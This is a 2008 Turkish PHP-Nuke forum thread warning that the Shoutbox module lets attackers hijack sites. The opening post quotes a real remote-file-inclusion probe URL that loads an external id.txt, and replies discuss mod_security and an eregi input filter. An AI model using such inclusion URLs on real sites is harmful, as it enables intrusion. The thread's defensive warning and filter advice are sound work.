Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 745
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 ME_Haber 2.3..
(108155 okuma, 145 yanıt)
 Resim Galerisi Modülü 2.0..
(121025 okuma, 173 yanıt)
 Ustalardan Bir Ricam Olac..
(13544 okuma, 6 yanıt)
 nukecode.com will close..
(11129 okuma, 5 yanıt)
 super youtube player a lo..
(6314 okuma, 1 yanıt)
 Need good PHP Haber port..
(5578 okuma, 0 yanıt)
 Forum Nasil Tam Sayfa Olu..
(34918 okuma, 40 yanıt)
 Php nuke Forumu Düzenleme..
(9878 okuma, 6 yanıt)
 Yeni Üyelik Aktivasyon Li..
(10937 okuma, 6 yanıt)
 Aşk Flashları Modülü..
(6947 okuma, 2 yanıt)
 resim galeri 2.0 da kateg..
(11356 okuma, 9 yanıt)
 Yeni iki modul: Merhumlar..
(32199 okuma, 36 yanıt)
 ürün tanıtım modülü..
(25140 okuma, 23 yanıt)
 PHP Nuke is out..
(14893 okuma, 13 yanıt)
 MSN Video Bing Video oldu..
(5173 okuma, 0 yanıt)
 haberhit.com..
(5763 okuma, 1 yanıt)
 Bilgi Yarışması 1.0 tama..
(51594 okuma, 72 yanıt)
 Musıc Box elinde olan var..
(6651 okuma, 2 yanıt)
 Online Okey , Batak , Tav..
(172238 okuma, 340 yanıt)
 Emlak Modül ve Blockları ..
(12220 okuma, 8 yanıt)
 WM who ist shampions..
(5016 okuma, 1 yanıt)
 coppermine resim galerisi..
(5461 okuma, 1 yanıt)
 Forumda Teşekkür Eklentis..
(9009 okuma, 7 yanıt)
 free wordpress themes..
(5550 okuma, 1 yanıt)
 JW image rotator for nsn ..
(7614 okuma, 4 yanıt)
 need Iletisim module..
(10955 okuma, 8 yanıt)
 Yeni modul: İletişim modu..
(27486 okuma, 33 yanıt)
 Başvuru Modulu ve Etkinli..
(5794 okuma, 1 yanıt)
 world cup flash..
(5019 okuma, 0 yanıt)
 ..:: Php Nuke FTP link Ha..
(4919 okuma, 0 yanıt)
 yeni phpnuke youtube 2.0..
(5145 okuma, 1 yanıt)
 Content Plus Önceki Konu ..
(4746 okuma, 0 yanıt)
 Php nuke Tickets Modülü..
(7939 okuma, 5 yanıt)
 need help to news time..
(4522 okuma, 0 yanıt)
 NSN News v3.0 new plugin..
(4811 okuma, 0 yanıt)
 how to save flash as imag..
(6017 okuma, 2 yanıt)
 Video Blok Yardım Lütfen...
(5952 okuma, 2 yanıt)
 gazete ara..
(9735 okuma, 5 yanıt)
 Bizim Yazarlar ve Bizim Ş..
(14846 okuma, 14 yanıt)
 Nuke Reflections v2 Türkç..
(14466 okuma, 14 yanıt)
 CNB Your Account 750 442 ..
(14164 okuma, 13 yanıt)
 Admin panelindeki simge ç..
(12262 okuma, 9 yanıt)
 Hosting Modülü..
(13949 okuma, 13 yanıt)
 Bizim şairler Modülü..
(5156 okuma, 1 yanıt)
 new plugin for nsn news v..
(4734 okuma, 1 yanıt)
 php nuke 8.0 türkce dil s..
(6876 okuma, 3 yanıt)
 Kan Bankası Modül istek..
(6108 okuma, 2 yanıt)
 Haber Konulari Sayfasinda..
(5724 okuma, 2 yanıt)
 Kan Bankası Modülünde İsi..
(7019 okuma, 3 yanıt)
 sonhaberler flash block ..
(6585 okuma, 4 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Shoutbox ile birlikte gelen tehlike...
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 

Shoutbox ile birlikte gelen tehlike...

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Modülleri
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
MesajTarih: 2008-07-06, 15:22:41    Mesaj konusu: Shoutbox ile birlikte gelen tehlike... Alıntıyla Cevap Gönder
Bir çok nuke sitesinde kullanılan Shoutbox modül ve blokunla birlikte sitenizi büyük bir tehlike beklemektedir bu tehlike kaynağı modüle ait shoutbox.js nin kendisi olmakla birlikte sitenizde yarattığı açık ile birlikte siteniz tam bir makine gücüne göre saldırı canavarına dönüşmektedir...

sitenizde Shoutbox kullanıyorsanız en kısa sürede bu blok ve ona ait olan herşeyi pasifize edin özellikle shoutbox.js dosyasını sisteminizden kaldırınız....

Zararı: sitenize kişi şu link ile kontak kurarak sitenizi saldırı moduna hazırlamaktadır.

http://www.siteniz.com/index.php?site=http://www.vanderjagt-kraanverhuur.nl/id.txt

bu açığı ise shoutbox.js yaratmaktadır incelemelerimde suç aleti olarak shoutbox.js her alanda çıktı karşıma...

siteniz üzerinden ne gibi saldırılar yaptırabilirler?

Liste: BEAGLE BEAGLE3 BLASTER BOTNETS BOTS BRUTEFORCE
DAMEWARE DEFACEMENT DIPNET DNSBOTS MALWAREURL MYDOOM
NACHI PHATBOT PHISHING ROUTERS SCAN445 SCANNERS
SINIT SLAMMER SPAM SPYBOT TOXBOT

bu araştırmayı neden yaptım?

ismini vermeyeceğim site bize ait makinelerde barındırılıyordu data centerdan rapor geldi raporda sadece site adı geçmekteydi site adından yola çıkarak arştırmalarımı yaptığımda shoutbox.js isimli scriptin bu iş için suç aleti olarak kullanıldığını gördüm...

Uyarı benden dikkate alması sizden...

Not: ilgili site Datacenter a bildirilerek zararlı dosya bulunduğu kaynağından kaldırtılmıştır...

işlemi yapan site ve ilgililer hakkında kanuni işlem yapılacağı ise tarafıma iletilmiştir...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor
Tarih: 2024-05-01, 19:25:18    Mesaj konusu: Forum Arası Reklamlar

Başa dön
sadrazam37
Mesaj: 200+
Mesaj: 200+





Kayıt: Jan 11, 2006
Mesajlar: 266
MesajTarih: 2008-07-06, 15:40:53    Mesaj konusu: Alıntıyla Cevap Gönder
Teşekkürler amanav
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
karaca25
Mesaj: 500+
Mesaj: 500+





Kayıt: Oct 02, 2007
Mesajlar: 717
MesajTarih: 2008-07-06, 16:54:43    Mesaj konusu: Alıntıyla Cevap Gönder
sildim attım sorun kalmadı Very Happy teşekkürler...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
mersoy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Dec 08, 2007
Mesajlar: 2316
MesajTarih: 2008-07-06, 16:59:06    Mesaj konusu: Alıntıyla Cevap Gönder
sentinel yüklüyse problem yok gibi, denedim
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
mavisce
Editör
Editör





Kayıt: Nov 18, 2005
Mesajlar: 943
Konum: Trabzon/izmir 61-35
MesajTarih: 2008-07-06, 17:12:13    Mesaj konusu: Alıntıyla Cevap Gönder
shoutbox.js dosyasının adı değiştirilirse dosyaya ulaşamazlar ve acık orttadan kalkar dimi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
AHMET_BALCI
Mesaj: 500+
Mesaj: 500+





Kayıt: Apr 10, 2007
Mesajlar: 766
MesajTarih: 2008-07-06, 18:37:06    Mesaj konusu: Alıntıyla Cevap Gönder
nedu zorları
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Ripper
Mesaj: 50+
Mesaj: 50+





Kayıt: Sep 16, 2006
Mesajlar: 66
MesajTarih: 2008-07-06, 23:51:58    Mesaj konusu: Alıntıyla Cevap Gönder
Normal nuke de herşey sonradan yüklenir ve eklenir Bundan dolayı bir çok açıkta beraberinde gelir o dediğiniz saldırı bir çok site üzerinden gelir sadece admin şifresini çalmak için ....
Bunu unutmayalım..
mesela nuke evolution hernekadar php nuke tabanlı olsada bu tür saldırılara karşı gereken önlemler alınmış nedeni ise nuke sentinel tüm modüllere uyarlanmış ve beraberinde ekli olarak gelir gerekli kodlar yapılmış işte bundan dolayı .htaccses te ayrıca kodlar var bu tür saldırılar için .
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Aliosman
Teknik Yönetici
Teknik Yönetici





Kayıt: Jul 20, 2002
Mesajlar: 3836
Konum: Balıkesir
MesajTarih: 2008-07-07, 08:44:13    Mesaj konusu: Alıntıyla Cevap Gönder
Sunucuda mod_security kurulu ve doğru rules ayarlıysa bu açığın hiçbir anlamı yok. :)
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor
Tarih: 2024-05-01, 19:25:18    Mesaj konusu: Forum Arası Reklamlar

Başa dön
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
MesajTarih: 2008-07-07, 09:41:19    Mesaj konusu: Alıntıyla Cevap Gönder
Aliosman :
Sunucuda mod_security kurulu ve doğru rules ayarlıysa bu açığın hiçbir anlamı yok. :)


sonuç itibari ile var olan birşey her sunucuda bu olmaz...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Aliosman
Teknik Yönetici
Teknik Yönetici





Kayıt: Jul 20, 2002
Mesajlar: 3836
Konum: Balıkesir
MesajTarih: 2008-07-07, 10:06:28    Mesaj konusu: Alıntıyla Cevap Gönder
Basit olarak mainfile.php den önlenebilir sanırım.

Örneğin phpnuke 7.6 orjinal sürümde GET metodu ile veriler süzülüyor.

Kod:

       (eregi("<http>]*>", $secvalue)) ||
    (eregi("<privm>]*>", $secvalue)) ||
    (eregi("<url>]*>", $secvalue)) ||



Denemeye çok vaktim olmadı ancak netopsiyon.com alt yapısında benzer bir kodlamam var. Sunucularımızda mod_security rules boş iken faydası oluyordu.

Benim ki bir örnek. Deneyip sonuç ileten olursa sevinirim.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Modülleri Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular
Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Kayan ShoutBox'a Avatar eklentisi... ... ramazanozturk Php Nuke Blocklar 0 2010-05-09, 12:30:44 Son Mesajı Görüntüle
Yeni mesaj yok İçeriği ile birlikte Satılık Domain -... dmg Domain Pazarı 0 2010-04-04, 20:55:10 Son Mesajı Görüntüle
Yeni mesaj yok Foruma Small Shoutbox ahududu NukeBB Eklentileri 0 2010-04-01, 18:18:29 Son Mesajı Görüntüle
Yeni mesaj yok Shoutbox Block ahududu Php Nuke Blocklar 5 2010-03-21, 18:32:49 Son Mesajı Görüntüle
Yeni mesaj yok pms'de gelen mesaj kodu nedir. flk44 Php Nuke Sorunlarınız 1 2010-01-14, 21:47:22 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright